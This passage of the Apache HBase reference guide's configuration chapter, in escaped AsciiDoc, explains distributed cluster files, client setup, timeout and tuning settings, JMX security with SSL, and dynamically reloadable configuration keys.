configuration basics are all demonstrated in <<quickstart_fully_distributed,quickstart-fully-distributed>>.\n\n.Distributed RegionServers\nTypically, your cluster will contain multiple RegionServers all running on different servers, as well as primary and backup Master and ZooKeeper daemons.\nThe _conf\/regionservers_ file on the master server contains a list of hosts whose RegionServers are associated with this cluster.\nEach host is on a separate line.\nAll hosts listed in this file will have their RegionServer processes started and stopped when the master server starts or stops.\n\n.ZooKeeper and HBase\nSee the <<zookeeper,ZooKeeper>> section for ZooKeeper setup instructions for HBase.\n\n.Example Distributed HBase Cluster\n====\nThis is a bare-bones _conf\/hbase-site.xml_ for a distributed HBase cluster.\nA cluster that is used for real-world work would contain more custom configuration parameters.\nMost HBase configuration directives have default values, which are used unless the value is overridden in the _hbase-site.xml_.\nSee \"<<config.files,Configuration Files>>\" for more information.\n\n[source,xml]\n----\n\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <\/property>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>node-a.example.com,node-b.example.com,node-c.example.com<\/value>\n <\/property>\n<\/configuration>\n----\n\nThis is an example _conf\/regionservers_ file, which contains a list of nodes that should run a RegionServer in the cluster.\nThese nodes need HBase installed and they need to use the same contents of the _conf\/_ directory as the Master server\n\n[source]\n----\n\nnode-a.example.com\nnode-b.example.com\nnode-c.example.com\n----\n\nThis is an example _conf\/backup-masters_ file, which contains a list of each node that should run a backup Master instance.\nThe backup Master instances will sit idle unless the main Master becomes unavailable.\n\n[source]\n----\n\nnode-b.example.com\nnode-c.example.com\n----\n====\n\n.Distributed HBase Quickstart\nSee <<quickstart_fully_distributed,quickstart-fully-distributed>> for a walk-through of a simple three-node cluster configuration with multiple ZooKeeper, backup HMaster, and RegionServer instances.\n\n.Procedure: HDFS Client Configuration\n. Of note, if you have made HDFS client configuration changes on your Hadoop cluster, such as configuration directives for HDFS clients, as opposed to server-side configurations, you must use one of the following methods to enable HBase to see and use these configuration changes:\n+\na. Add a pointer to your `HADOOP_CONF_DIR` to the `HBASE_CLASSPATH` environment variable in _hbase-env.sh_.\nb. Add a copy of _hdfs-site.xml_ (or _hadoop-site.xml_) or, better, symlinks, under _${HBASE_HOME}\/conf_, or\nc. if only a small set of HDFS client configurations, add them to _hbase-site.xml_.\n\n\nAn example of such an HDFS client configuration is `dfs.replication`.\nIf for example, you want to run with a replication factor of 5, HBase will create files with the default of 3 unless you do the above to make the configuration available to HBase.\n\n[[confirm]]\n== Running and Confirming Your Installation\n\nMake sure HDFS is running first.\nStart and stop the Hadoop HDFS daemons by running _bin\/start-hdfs.sh_ over in the `HADOOP_HOME` directory.\nYou can ensure it started properly by testing the `put` and `get` of files into the Hadoop filesystem.\nHBase does not normally use the MapReduce or YARN daemons. These do not need to be started.\n\n_If_ you are managing your own ZooKeeper, start it and confirm it's running, else HBase will start up ZooKeeper for you as part of its start process.\n\nStart HBase with the following command:\n\n----\nbin\/start-hbase.sh\n----\n\nRun the above from the `HBASE_HOME` directory.\n\nYou should now have a running HBase instance.\nHBase logs can be found in the _logs_ subdirectory.\nCheck them out especially if HBase had trouble starting.\n\nHBase also puts up a UI listing vital attributes.\nBy default it's deployed on the Master host at port 16010 (HBase RegionServers listen on port 16020 by default and put up an informational HTTP server at port 16030). If the Master is running on a host named `master.example.org` on the default port, point your browser at pass:[http:\/\/master.example.org:16010] to see the web interface.\n\nOnce HBase has started, see the <<shell_exercises,shell exercises>> section for how to create tables, add data, scan your insertions, and finally disable and drop your tables.\n\nTo stop HBase after exiting the HBase shell enter\n\n----\n$ .\/bin\/stop-hbase.sh\nstopping hbase...............\n----\n\nShutdown can take a moment to complete.\nIt can take longer if your cluster is comprised of many machines.\nIf you are running a distributed operation, be sure to wait until HBase has shut down completely before stopping the Hadoop daemons.\n\n[[config.files]]\n== Default Configuration\n\n[[hbase.site]]\n=== _hbase-site.xml_ and _hbase-default.xml_\n\nJust as in Hadoop where you add site-specific HDFS configuration to the _hdfs-site.xml_ file, for HBase, site specific customizations go into the file _conf\/hbase-site.xml_.\nFor the list of configurable properties, see <<hbase_default_configurations,hbase default configurations>> below or view the raw _hbase-default.xml_ source file in the HBase source code at _src\/main\/resources_.\n\nNot all configuration options make it out to _hbase-default.xml_.\nSome configurations would only appear in source code; the only way to identify these changes are through code review.\n\nCurrently, changes here will require a cluster restart for HBase to notice the change.\n\/\/ hbase\/src\/main\/asciidoc\n\/\/\ninclude::{docdir}\/..\/..\/..\/target\/asciidoc\/hbase-default.adoc[]\n\n\n[[hbase.env.sh]]\n=== _hbase-env.sh_\n\nSet HBase environment variables in this file.\nExamples include options to pass the JVM on start of an HBase daemon such as heap size and garbage collector configs.\nYou can also set configurations for HBase configuration, log directories, niceness, ssh options, where to locate process pid files, etc.\nOpen the file at _conf\/hbase-env.sh_ and peruse its content.\nEach option is fairly well documented.\nAdd your own environment variables here if you want them read by HBase daemons on startup.\n\nChanges here will require a cluster restart for HBase to notice the change.\n\n[[log4j]]\n=== _log4j.properties_\n\nEdit this file to change rate at which HBase files are rolled and to change the level at which HBase logs messages.\n\nChanges here will require a cluster restart for HBase to notice the change though log levels can be changed for particular daemons via the HBase UI.\n\n[[client_dependencies]]\n=== Client configuration and dependencies connecting to an HBase cluster\n\nIf you are running HBase in standalone mode, you don't need to configure anything for your client to work provided that they are all on the same machine.\n\nSince the HBase Master may move around, clients bootstrap by looking to ZooKeeper for current critical locations.\nZooKeeper is where all these values are kept.\nThus clients require the location of the ZooKeeper ensemble before they can do anything else.\nUsually this ensemble location is kept out in the _hbase-site.xml_ and is picked up by the client from the `CLASSPATH`.\n\nIf you are configuring an IDE to run an HBase client, you should include the _conf\/_ directory on your classpath so _hbase-site.xml_ settings can be found (or add _src\/test\/resources_ to pick up the hbase-site.xml used by tests).\n\nMinimally, an HBase client needs hbase-client module in its dependencies when connecting to a cluster:\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.hbase<\/groupId>\n <artifactId>hbase-client<\/artifactId>\n <version>1.2.4<\/version>\n<\/dependency>\n----\n\nA basic example _hbase-site.xml_ for client only may look as follows:\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>The directory shared by region servers.\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[java.client.config]]\n==== Java client configuration\n\nThe configuration used by a Java client is kept in an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HBaseConfiguration[HBaseConfiguration] instance.\n\nThe factory method on HBaseConfiguration, `HBaseConfiguration.create();`, on invocation, will read in the content of the first _hbase-site.xml_ found on the client's `CLASSPATH`, if one is present (Invocation will also factor in any _hbase-default.xml_ found; an _hbase-default.xml_ ships inside the _hbase.X.X.X.jar_). It is also possible to specify configuration directly without having to read from a _hbase-site.xml_.\nFor example, to set the ZooKeeper ensemble for the cluster programmatically do as follows:\n\n[source,java]\n----\nConfiguration config = HBaseConfiguration.create();\nconfig.set(\"hbase.zookeeper.quorum\", \"localhost\"); \/\/ Here we are running zookeeper locally\n----\n\nIf multiple ZooKeeper instances make up your ZooKeeper ensemble, they may be specified in a comma-separated list (just as in the _hbase-site.xml_ file). This populated `Configuration` instance can then be passed to an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], and so on.\n\n[[config_timeouts]]\n=== Timeout settings\n\nHBase provides many timeout settings to limit the execution time of different remote operations.\n\nThe `hbase.rpc.timeout` property limits how long an RPC call can run before it times out.\nYou can also specify a timeout for read and write operations using `hbase.rpc.read.timeout` and `hbase.rpc.write.timeout` configuration properties. In the absence of these properties `hbase.rpc.timeout` will be used.\nA higher-level timeout is `hbase.client.operation.timeout` which is valid for each client call.\nTimeout for scan operations is controlled differently. To set it you can use `hbase.client.scanner.timeout.period` property.\n\n[[example_config]]\n== Example Configurations\n\n=== Basic Distributed HBase Install\n\nHere is a basic configuration example for a distributed ten node cluster:\n* The nodes are named `example0`, `example1`, etc., through node `example9` in this example.\n* The HBase Master and the HDFS NameNode are running on the node `example0`.\n* RegionServers run on nodes `example1`-`example9`.\n* A 3-node ZooKeeper ensemble runs on `example1`, `example2`, and `example3` on the default ports.\n* ZooKeeper data is persisted to the directory _\/export\/zookeeper_.\n\nBelow we show what the main configuration files -- _hbase-site.xml_, _regionservers_, and _hbase-env.sh_ -- found in the HBase _conf_ directory might look like.\n\n[[hbase_site]]\n==== _hbase-site.xml_\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>The directory shared by RegionServers.\n <\/description>\n <\/property>\n <property>\n <name>hbase.zookeeper.property.dataDir<\/name>\n <value>\/export\/zookeeper<\/value>\n <description>Property from ZooKeeper config zoo.cfg.\n The directory where the snapshot is stored.\n <\/description>\n <\/property>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/example0:8020\/hbase<\/value>\n <description>The directory shared by RegionServers.\n <\/description>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <description>The mode the cluster will be in. Possible values are\n false: standalone and pseudo-distributed setups with managed ZooKeeper\n true: fully-distributed with unmanaged ZooKeeper Quorum (see hbase-env.sh)\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[regionservers]]\n==== _regionservers_\n\nIn this file you list the nodes that will run RegionServers.\nIn our case, these nodes are `example1`-`example9`.\n\n[source]\n----\nexample1\nexample2\nexample3\nexample4\nexample5\nexample6\nexample7\nexample8\nexample9\n----\n\n[[hbase_env]]\n==== _hbase-env.sh_\n\nThe following lines in the _hbase-env.sh_ file show how to set the `JAVA_HOME` environment variable (required for HBase) and set the heap to 4 GB (rather than the default value of 1 GB). If you copy and paste this example, be sure to adjust the `JAVA_HOME` to suit your environment.\n\n----\n# The java implementation to use.\nexport JAVA_HOME=\/usr\/java\/jdk1.8.0\/\n\n# The maximum amount of heap to use. Default is left to JVM default.\nexport HBASE_HEAPSIZE=4G\n----\n\nUse +rsync+ to copy the content of the _conf_ directory to all nodes of the cluster.\n\n[[important_configurations]]\n== The Important Configurations\n\nBelow we list some _important_ configurations.\nWe've divided this section into required configuration and worth-a-look recommended configs.\n\n[[required_configuration]]\n=== Required Configurations\n\nReview the <<os,os>> and <<hadoop,hadoop>> sections.\n\n[[big.cluster.config]]\n==== Big Cluster Configurations\n\nIf you have a cluster with a lot of regions, it is possible that a Regionserver checks in briefly after the Master starts while all the remaining RegionServers lag behind. This first server to check in will be assigned all regions which is not optimal.\nTo prevent the above scenario from happening, up the `hbase.master.wait.on.regionservers.mintostart` property from its default value of 1.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6389[HBASE-6389 Modify the\n conditions to ensure that Master waits for sufficient number of Region Servers before\n starting region assignments] for more detail.\n\n[[recommended_configurations]]\n=== Recommended Configurations\n\n[[recommended_configurations.zk]]\n==== ZooKeeper Configuration\n\n[[sect.zookeeper.session.timeout]]\n===== `zookeeper.session.timeout`\n\nThe default timeout is three minutes (specified in milliseconds). This means that if a server crashes, it will be three minutes before the Master notices the crash and starts recovery.\nYou might need to tune the timeout down to a minute or even less so the Master notices failures sooner.\nBefore changing this value, be sure you have your JVM garbage collection configuration under control, otherwise, a long garbage collection that lasts beyond the ZooKeeper session timeout will take out your RegionServer. (You might be fine with this -- you probably want recovery to start on the server if a RegionServer has been in GC for a long period of time).\n\nTo change this configuration, edit _hbase-site.xml_, copy the changed file across the cluster and restart.\n\nWe set this value high to save our having to field questions up on the mailing lists asking why a RegionServer went down during a massive import.\nThe usual cause is that their JVM is untuned and they are running into long GC pauses.\nOur thinking is that while users are getting familiar with HBase, we'd save them having to know all of its intricacies.\nLater when they've built some confidence, then they can play with configuration such as this.\n\n[[zookeeper.instances]]\n===== Number of ZooKeeper Instances\n\nSee <<zookeeper,zookeeper>>.\n\n[[recommended.configurations.hdfs]]\n==== HDFS Configurations\n\n[[dfs.datanode.failed.volumes.tolerated]]\n===== `dfs.datanode.failed.volumes.tolerated`\n\nThis is the \"...number of volumes that are allowed to fail before a DataNode stops offering service.\nBy default any volume failure will cause a datanode to shutdown\" from the _hdfs-default.xml_ description.\nYou might want to set this to about half the amount of your available disks.\n\n[[hbase.regionserver.handler.count]]\n===== `hbase.regionserver.handler.count`\n\nThis setting defines the number of threads that are kept open to answer incoming requests to user tables.\nThe rule of thumb is to keep this number low when the payload per request approaches the MB (big puts, scans using a large cache) and high when the payload is small (gets, small puts, ICVs, deletes). The total size of the queries in progress is limited by the setting `hbase.ipc.server.max.callqueue.size`.\n\nIt is safe to set that number to the maximum number of incoming clients if their payload is small, the typical example being a cluster that serves a website since puts aren't typically buffered and most of the operations are gets.\n\nThe reason why it is dangerous to keep this setting high is that the aggregate size of all the puts that are currently happening in a region server may impose too much pressure on its memory, or even trigger an OutOfMemoryError.\nA RegionServer running on low memory will trigger its JVM's garbage collector to run more frequently up to a point where GC pauses become noticeable (the reason being that all the memory used to keep all the requests' payloads cannot be trashed, no matter how hard the garbage collector tries). After some time, the overall cluster throughput is affected since every request that hits that RegionServer will take longer, which exacerbates the problem even more.\n\nYou can get a sense of whether you have too little or too many handlers by <<rpc.logging,rpc.logging>> on an individual RegionServer then tailing its logs (Queued requests consume memory).\n\n[[big_memory]]\n==== Configuration for large memory machines\n\nHBase ships with a reasonable, conservative configuration that will work on nearly all machine types that people might want to test with.\nIf you have larger machines -- HBase has 8G and larger heap -- you might find the following configuration options helpful.\nTODO.\n\n[[config.compression]]\n==== Compression\n\nYou should consider enabling ColumnFamily compression.\nThere are several options that are near-frictionless and in most all cases boost performance by reducing the size of StoreFiles and thus reducing I\/O.\n\nSee <<compression,compression>> for more information.\n\n[[config.wals]]\n==== Configuring the size and number of WAL files\n\nHBase uses <<wal,wal>> to recover the memstore data that has not been flushed to disk in case of an RS failure.\nThese WAL files should be configured to be slightly smaller than HDFS block (by default a HDFS block is 64Mb and a WAL file is ~60Mb).\n\nHBase also has a limit on the number of WAL files, designed to ensure there's never too much data that needs to be replayed during recovery.\nThis limit needs to be set according to memstore configuration, so that all the necessary data would fit.\nIt is recommended to allocate enough WAL files to store at least that much data (when all memstores are close to full). For example, with 16Gb RS heap, default memstore settings (0.4), and default WAL file size (~60Mb), 16Gb*0.4\/60, the starting point for WAL file count is ~109.\nHowever, as all memstores are not expected to be full all the time, less WAL files can be allocated.\n\n[[disable.splitting]]\n==== Managed Splitting\n\nHBase generally handles splitting of your regions based upon the settings in your _hbase-default.xml_ and _hbase-site.xml_ configuration files.\nImportant settings include `hbase.regionserver.region.split.policy`, `hbase.hregion.max.filesize`, `hbase.regionserver.regionSplitLimit`.\nA simplistic view of splitting is that when a region grows to `hbase.hregion.max.filesize`, it is split.\nFor most usage patterns, you should use automatic splitting.\nSee <<manual_region_splitting_decisions,manual region splitting decisions>> for more information about manual region splitting.\n\nInstead of allowing HBase to split your regions automatically, you can choose to manage the splitting yourself.\nThis feature was added in HBase 0.90.0.\nManually managing splits works if you know your keyspace well, otherwise let HBase figure where to split for you.\nManual splitting can mitigate region creation and movement under load.\nIt also makes it so region boundaries are known and invariant (if you disable region splitting). If you use manual splits, it is easier doing staggered, time-based major compactions to spread out your network IO load.\n\n.Disable Automatic Splitting\nTo disable automatic splitting, you can set region split policy in either cluster configuration or table configuration to be `org.apache.hadoop.hbase.regionserver.DisabledRegionSplitPolicy`\n\n.Automatic Splitting Is Recommended\n[NOTE]\n====\nIf you disable automatic splits to diagnose a problem or during a period of fast data growth, it is recommended to re-enable them when your situation becomes more stable.\nThe potential benefits of managing region splits yourself are not undisputed.\n====\n\n.Determine the Optimal Number of Pre-Split Regions\nThe optimal number of pre-split regions depends on your application and environment.\nA good rule of thumb is to start with 10 pre-split regions per server and watch as data grows over time.\nIt is better to err on the side of too few regions and perform rolling splits later.\nThe optimal number of regions depends upon the largest StoreFile in your region.\nThe size of the largest StoreFile will increase with time if the amount of data grows.\nThe goal is for the largest region to be just large enough that the compaction selection algorithm only compacts it during a timed major compaction.\nOtherwise, the cluster can be prone to compaction storms with a large number of regions under compaction at the same time.\nIt is important to understand that the data growth causes compaction storms and not the manual split decision.\n\nIf the regions are split into too many large regions, you can increase the major compaction interval by configuring `HConstants.MAJOR_COMPACTION_PERIOD`.\nHBase 0.90 introduced `org.apache.hadoop.hbase.util.RegionSplitter`, which provides a network-IO-safe rolling split of all regions.\n\n[[managed.compactions]]\n==== Managed Compactions\n\nBy default, major compactions are scheduled to run once in a 7-day period.\nPrior to HBase 0.96.x, major compactions were scheduled to happen once per day by default.\n\nIf you need to control exactly when and how often major compaction runs, you can disable managed major compactions.\nSee the entry for `hbase.hregion.majorcompaction` in the <<compaction.parameters,compaction.parameters>> table for details.\n\n.Do Not Disable Major Compactions\n[WARNING]\n====\nMajor compactions are absolutely necessary for StoreFile clean-up.\nDo not disable them altogether.\nYou can run major compactions manually via the HBase shell or via the link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin API].\n====\n\nFor more information about compactions and the compaction file selection process, see <<compaction,compaction>>\n\n[[spec.ex]]\n==== Speculative Execution\n\nSpeculative Execution of MapReduce tasks is on by default, and for HBase clusters it is generally advised to turn off Speculative Execution at a system-level unless you need it for a specific case, where it can be configured per-job.\nSet the properties `mapreduce.map.speculative` and `mapreduce.reduce.speculative` to false.\n\n[[other_configuration]]\n=== Other Configurations\n\n[[balancer_config]]\n==== Balancer\n\nThe balancer is a periodic operation which is run on the master to redistribute regions on the cluster.\nIt is configured via `hbase.balancer.period` and defaults to 300000 (5 minutes).\n\nSee <<master.processes.loadbalancer,master.processes.loadbalancer>> for more information on the LoadBalancer.\n\n[[disabling.blockcache]]\n==== Disabling Blockcache\n\nDo not turn off block cache (You'd do it by setting `hfile.block.cache.size` to zero). Currently we do not do well if you do this because the RegionServer will spend all its time loading HFile indices over and over again.\nIf your working set is such that block cache does you no good, at least size the block cache such that HFile indices will stay up in the cache (you can get a rough idea on the size you need by surveying RegionServer UIs; you'll see index block size accounted near the top of the webpage).\n\n[[nagles]]\n==== link:http:\/\/en.wikipedia.org\/wiki\/Nagle's_algorithm[Nagle's] or the small package problem\n\nIf a big 40ms or so occasional delay is seen in operations against HBase, try the Nagles' setting.\nFor example, see the user mailing list thread, link:http:\/\/search-hadoop.com\/m\/pduLg2fydtE\/Inconsistent+scan+performance+with+caching+set+&subj=Re+Inconsistent+scan+performance+with+caching+set+to+1[Inconsistent scan performance with caching set to 1] and the issue cited therein where setting `notcpdelay` improved scan speeds.\nYou might also see the graphs on the tail of link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7008[HBASE-7008 Set scanner caching to a better default] where our Lars Hofhansl tries various data sizes w\/ Nagle's on and off measuring the effect.\n\n[[mttr]]\n==== Better Mean Time to Recover (MTTR)\n\nThis section is about configurations that will make servers come back faster after a fail.\nSee the Deveraj Das and Nicolas Liochon blog post link:http:\/\/hortonworks.com\/blog\/introduction-to-hbase-mean-time-to-recover-mttr\/[Introduction to HBase Mean Time to Recover (MTTR)] for a brief introduction.\n\nThe issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-8389[HBASE-8354 forces Namenode into loop with lease recovery requests] is messy but has a bunch of good discussion toward the end on low timeouts and how to cause faster recovery including citation of fixes added to HDFS. Read the Varun Sharma comments.\nThe below suggested configurations are Varun's suggestions distilled and tested.\nMake sure you are running on a late-version HDFS so you have the fixes he refers to and himself adds to HDFS that help HBase MTTR (e.g.\nHDFS-3703, HDFS-3712, and HDFS-4791 -- Hadoop 2 for sure has them and late Hadoop 1 has some). Set the following in the RegionServer.\n\n[source,xml]\n----\n<property>\n <name>hbase.lease.recovery.dfs.timeout<\/name>\n <value>23000<\/value>\n <description>How much time we allow elapse between calls to recover lease.\n Should be larger than the dfs timeout.<\/description>\n<\/property>\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n----\n\nAnd on the NameNode\/DataNode side, set the following to enable 'staleness' introduced in HDFS-3703, HDFS-3912.\n\n[source,xml]\n----\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>dfs.datanode.socket.write.timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 8 * 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.timeout<\/name>\n <value>3000<\/value>\n <description>Down from 60 seconds to 3.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.max.retries.on.timeouts<\/name>\n <value>2<\/value>\n <description>Down from 45 seconds to 3 (2 == 3 retries).<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.read.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.stale.datanode.interval<\/name>\n <value>20000<\/value>\n <description>Down from default 30 seconds<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.write.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n----\n\n[[jmx_config]]\n==== JMX\n\nJMX (Java Management Extensions) provides built-in instrumentation that enables you to monitor and manage the Java VM.\nTo enable monitoring and management from remote systems, you need to set system property `com.sun.management.jmxremote.port` (the port number through which you want to enable JMX RMI connections) when you start the Java VM.\nSee the link:http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/management\/agent.html[official documentation] for more information.\nHistorically, besides above port mentioned, JMX opens two additional random TCP listening ports, which could lead to port conflict problem. (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10289[HBASE-10289] for details)\n\nAs an alternative, You can use the coprocessor-based JMX implementation provided by HBase.\nTo enable it in 0.99 or above, add below property in _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.regionserver.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nNOTE: DO NOT set `com.sun.management.jmxremote.port` for Java VM at the same time.\n\nCurrently it supports Master and RegionServer Java VM.\nBy default, the JMX listens on TCP port 10102, you can further configure the port using below properties:\n\n[source,xml]\n----\n<property>\n <name>regionserver.rmi.registry.port<\/name>\n <value>61130<\/value>\n<\/property>\n<property>\n <name>regionserver.rmi.connector.port<\/name>\n <value>61140<\/value>\n<\/property>\n----\n\nThe registry port can be shared with connector port in most cases, so you only need to configure regionserver.rmi.registry.port.\nHowever if you want to use SSL communication, the 2 ports must be configured to different values.\n\nBy default the password authentication and SSL communication is disabled.\nTo enable password authentication, you need to update _hbase-env.sh_ like below:\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password_file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nSee example password\/access file under _$JRE_HOME\/lib\/management_.\n\nTo enable SSL communication with password authentication, follow below steps:\n\n[source,bash]\n----\n#1. generate a key pair, stored in myKeyStore\nkeytool -genkey -alias jconsole -keystore myKeyStore\n\n#2. export it to file jconsole.cert\nkeytool -export -alias jconsole -keystore myKeyStore -file jconsole.cert\n\n#3. copy jconsole.cert to jconsole client machine, import it to jconsoleKeyStore\nkeytool -import -alias jconsole -keystore jconsoleKeyStore -file jconsole.cert\n----\n\nAnd then update _hbase-env.sh_ like below:\n\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.ssl=true \\\n -Djavax.net.ssl.keyStore=\/home\/tianq\/myKeyStore \\\n -Djavax.net.ssl.keyStorePassword=your_password_in_step_1 \\\n -Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nFinally start `jconsole` on the client using the key store:\n\n[source,bash]\n----\njconsole -J-Djavax.net.ssl.trustStore=\/home\/tianq\/jconsoleKeyStore\n----\n\nNOTE: To enable the HBase JMX implementation on Master, you also need to add below property in _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nThe corresponding properties for port configuration are `master.rmi.registry.port` (by default 10101) and `master.rmi.connector.port` (by default the same as registry.port)\n\n[[dyn_config]]\n== Dynamic Configuration\n\nSince HBase 1.0.0, it is possible to change a subset of the configuration without requiring a server restart.\nIn the HBase shell, there are new operators, `update_config` and `update_all_config` that will prompt a server or all servers to reload configuration.\n\nOnly a subset of all configurations can currently be changed in the running server.\nHere are those configurations:\n\n.Configurations support dynamically change\n[cols=\"1\",options=\"header\"]\n|===\n| Key\n| hbase.ipc.server.fallback-to-simple-auth-allowed\n| hbase.cleaner.scan.dir.concurrent.size\n| hbase.regionserver.thread.compaction.large\n| hbase.regionserver.thread.compaction.small\n| hbase.regionserver.thread.split\n| hbase.regionserver.throughput.controller\n| hbase.regionserver.thread.hfilecleaner.throttle\n| hbase.regionserver.hfilecleaner.large.queue.size\n| hbase.regionserver.hfilecleaner.small.queue.size\n| hbase.regionserver.hfilecleaner.large.thread.count\n| hbase.regionserver.hfilecleaner.small.thread.count\n| hbase.regionserver.flush.throughput.controller\n| hbase.hstore.compaction.max.size\n| hbase.hstore.compaction.max.size.offpeak\n| hbase.hstore.compaction.min.size\n| hbase.hstore.compaction.min\n| hbase.hstore.compaction.max\n| hbase.hstore.compaction.ratio\n| hbase.hstore.compaction.ratio.offpeak\n| hbase.regionserver.thread.compaction.throttle\n| hbase.hregion.majorcompaction\n| hbase.hregion.majorcompaction.jitter\n| hbase.hstore.min.locality.to.skip.major.compact\n| hbase.hstore.compaction.date.tiered.max.storefile.age.millis\n| hbase.hstore.compaction.date.tiered.incoming.window.min\n| hbase.hstore.compaction.date.tiered.window.policy.class\n| hbase.hstore.compaction.date.tiered.single.output.for.minor.compaction\n| hbase.hstore.compaction.date.tiered.window.factory.class\n| hbase.offpeak.start.hour\n| hbase.offpeak.end.hour\n| hbase.oldwals.cleaner.thread.size\n| hbase.procedure.worker.keep.alive.time.msec\n| hbase.procedure.worker.add.stuck.percentage\n| hbase.procedure.worker.monitor.interval.msec\n| hbase.procedure.worker.stuck.threshold.msec\n| hbase.regions.slop\n| hbase.regions.overallSlop\n| hbase.balancer.tablesOnMaster\n| hbase.balancer.tablesOnMaster.systemTablesOnly\n| hbase.util.ip.to.rack.determiner\n| hbase.ipc.server.max.callqueue.length\n| hbase.ipc.server.priority.max.callqueue.length\n| hbase.ipc.server.callqueue.type\n| hbase.ipc.server.callqueue.codel.target.delay\n| hbase.ipc.server.callqueue.codel.interval\n| hbase.ipc.server.callqueue.codel.lifo.threshold\n| hbase.master.balancer.stochastic.maxSteps\n| hbase.master.balancer.stochastic.stepsPerRegion\n| hbase.master.balancer.stochastic.maxRunningTime\n| hbase.master.balancer.stochastic.runMaxSteps\n| hbase.master.balancer.stochastic.numRegionLoadsToRemember\n| hbase.master.loadbalance.bytable\n| hbase.master.balancer.stochastic.minCostNeedBalance\n| hbase.master.balancer.stochastic.localityCost\n| hbase.master.balancer.stochastic.rackLocalityCost\n| hbase.master.balancer.stochastic.readRequestCost\n| hbase.master.balancer.stochastic.writeRequestCost\n| hbase.master.balancer.stochastic.memstoreSizeCost\n| hbase.master.balancer.stochastic.storefileSizeCost\n| hbase.master.balancer.stochastic.regionReplicaHostCostKey\n| hbase.master.balancer.stochastic.regionReplicaRackCostKey\n| hbase.master.balancer.stochastic.regionCountCost\n| hbase.master.balancer.stochastic.primaryRegionCountCost\n| hbase.master.balancer.stochastic.moveCost\n| hbase.master.balancer.stochastic.maxMovePercent\n| hbase.master.balancer.stochastic.tableSkewCost\n|===\n\nifdef::backend-docbook[]\n[index]\n== Index\n\/\/ Generated automatically by the DocBook toolchain.\nendif::backend-docbook[]\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[configuration]]\n= Apache HBase Configuration\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter expands upon the <<getting_started>> chapter to further explain configuration of Apache 